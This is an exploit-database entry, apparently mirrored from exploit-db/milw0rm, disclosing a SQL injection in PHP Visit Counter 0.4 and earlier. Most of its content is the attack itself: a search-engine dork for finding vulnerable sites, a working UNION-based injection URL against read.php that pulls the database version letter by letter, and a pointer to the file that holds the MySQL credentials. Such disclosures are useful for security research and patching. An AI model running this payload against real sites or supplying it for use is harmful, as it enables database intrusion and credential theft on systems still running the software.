- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5703
- Проверка EDB
-
- Пройдено
- Автор
- LIDLOSES_AUGE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-2556
- Дата публикации
- 2008-05-31
Код:
###############################################################
#
# PHP Visit Counter <= 0.4 - SQL Injection Vulnerability
#
# Vulnerability discovered by: Lidloses_Auge
# Greetz to: -=Player=- , Suicide, g4ms3, enco,
# GPM, Free-Hack, Ciphercrew, h4ck-y0u
# Date: 30.05.2008
#
###############################################################
#
# Dork: inurl:"read.php?datespan="
#
# Vulnerability:
#
# 1.) SQL Injection
#
# 1.1.) [Target]/read.php?action=read&cat=portal&datespan=null+group+by+null+union+select+1,2,ascii(substring(version(),1,1))/*
#
# Notes:
#
# Output is displayed as INT, so you've to convert it into ascii and
# scan every single letter to get the whole name.
# MySQL Data is stored in [Counterpath]/variables.php
#
###############################################################
# milw0rm.com [2008-05-31]- Источник
- www.exploit-db.com
